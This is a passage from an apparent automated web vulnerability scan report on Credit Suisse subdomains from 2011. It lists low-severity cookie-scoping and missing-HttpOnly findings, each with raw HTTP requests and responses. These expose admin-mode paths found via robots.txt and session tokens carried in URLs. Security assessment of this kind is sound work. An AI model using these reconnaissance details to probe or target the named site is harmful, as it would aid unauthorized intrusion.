Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:35:28 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:35:29 GMT
location: /app/home/index.cfm?fuseaction=OpenHome&lang=EN
expires: Mon, 19 Sep 2011 15:35:29 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.36. https://responsibility.credit-suisse.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
location: /app/topic/index.cfm?fuseaction=OpenTopic&coid=218193&lang=EN
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.37. https://responsibility.credit-suisse.com/app/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
location: /index.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.38. https://responsibility.credit-suisse.com/app/_admin/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/_admin/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_admin/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:20 GMT
location: https://admin.emagazine.ch/app/_admin/index.cfm?client=emagazine
expires: Mon, 19 Sep 2011 15:33:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.39. https://responsibility.credit-suisse.com/app/_control/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/_control/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_control/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>EMAGAZINE [ ADMIN MODE ]</title>
<link rel="STYLESHEET" type="text/css" href="https://admin.emagazine.
...[SNIP]...

3.40. https://responsibility.credit-suisse.com/app/_control/act_login_adminmode.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/_control/act_login_adminmode.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_control/act_login_adminmode.cfm HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:37:27 GMT
Server: Apache
server-error: true
Last-Modified: Mon, 19 Sep 2011 14:37:27 GMT
location: /app/_error/error.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:37:27 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Connection: close
Content-Type: text/html; charset=UTF-8


3.41. https://responsibility.credit-suisse.com/app/_gen/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/_gen/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_gen/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:20 GMT
expires: Mon, 19 Sep 2011 15:33:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<script type="text/javascript">/* <![CDATA[ */
   if (wind
...[SNIP]...

3.42. https://responsibility.credit-suisse.com/app/_gen/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/_gen/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_gen/index.cfm HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:47:23 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:47:23 GMT
expires: Mon, 19 Sep 2011 15:47:23 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<script type="text/javascript">/* <![CDATA[ */
   if (wind
...[SNIP]...

3.43. https://responsibility.credit-suisse.com/app/_return/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/_return/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/_return/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:21 GMT
Server: Apache
server-error: true
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
location: /app/_error/error.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Connection: close
Content-Type: text/html; charset=UTF-8


3.44. https://responsibility.credit-suisse.com/app/article/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/article/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:20 GMT
location: /?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:33:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.45. https://responsibility.credit-suisse.com/app/article/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/article/index.cfm?bhjs=-1 HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/app/article/index.cfm
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:20 GMT
location: /?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:33:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.46. https://responsibility.credit-suisse.com/app/article/index3.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index3.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/article/index3.cfm HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:08 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:08 GMT
expires: Mon, 19 Sep 2011 15:37:08 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


   <script language="JavaScript" type="text/javascript">
   <!--
       if(window.opener == undefined){
           location.href = "https://infocus.credit-suisse.com";
       }else{
           window.close();
       }
   //-->

...[SNIP]...

3.47. https://responsibility.credit-suisse.com/app/error/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/error/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/error/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:21 GMT
Server: Apache
server-error: true
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
location: /app/_error/error.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Connection: close
Content-Type: text/html; charset=UTF-8


3.48. https://responsibility.credit-suisse.com/app/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/index.cfm?bhjs=-1 HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/app/
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:19 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:20 GMT
location: /index.cfm?CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:33:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.49. https://responsibility.credit-suisse.com/app/newsletter/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/newsletter/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/newsletter/index.cfm HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:37:39 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:39 GMT
location: /index.cfm?fuseaction=OpenNewsletter&CFID=38646949&CFTOKEN=99323788
expires: Mon, 19 Sep 2011 15:37:39 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.50. https://responsibility.credit-suisse.com/app/print/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/print/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/print/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<link type='text/css' rel='stylesheet' href='/app/_css/FF.css'>

<div style="text-align:left; margin:15px;">
<img src="https://emagazine.credit-suisse.com/a
...[SNIP]...

3.51. https://responsibility.credit-suisse.com/app/print/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/print/index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/print/index.cfm HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:37 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:37 GMT
expires: Mon, 19 Sep 2011 15:37:37 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<link type='text/css' rel='stylesheet' href='/app/_css/FF.css'>

<div style="text-align:left; margin:15px;">
<img src="https://emagazine.credit-suisse.com/a
...[SNIP]...

3.52. https://responsibility.credit-suisse.com/app/sendpage/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/sendpage/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/sendpage/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:20 GMT
expires: Mon, 19 Sep 2011 15:33:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8

<style>


   table.cfdump_wddx,
   table.cfdump_xml,
   table.cfdump_struct,
   table.cfdump_varundefined,
   table.cfdump_array,
   table.cfdump_query,
   table.cfdump_cfc,
   table.cfdump_object,
   table.
...[SNIP]...

3.53. https://responsibility.credit-suisse.com/app/sitemap/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/sitemap/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/sitemap/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
location: /
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.54. https://responsibility.credit-suisse.com/app/stat/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /app/stat/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/stat/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:19 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:20 GMT
location: /
expires: Mon, 19 Sep 2011 15:33:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


3.55. https://responsibility.credit-suisse.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://responsibility.credit-suisse.com
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm?bhjs=-1 HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:33:19 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:20 GMT
location: /app/topic/index.cfm?fuseaction=OpenTopic&coid=218193&lang=EN
expires: Mon, 19 Sep 2011 15:33:20 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


4. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://infocus.credit-suisse.com
Path:   /jamez_customtags/control/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /jamez_customtags/control/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:38:49 GMT
Server: Apache
server-error: true
pragma: no-cache
location: /jamez_customtags/default.cfm?CFID=38646949&CFTOKEN=99323788
expires: now()
cache-control: no-cache, no-store, must-revalidate
Set-Cookie: CFID=38646949;path=/
Set-Cookie: CFTOKEN=99323788;path=/
Connection: close
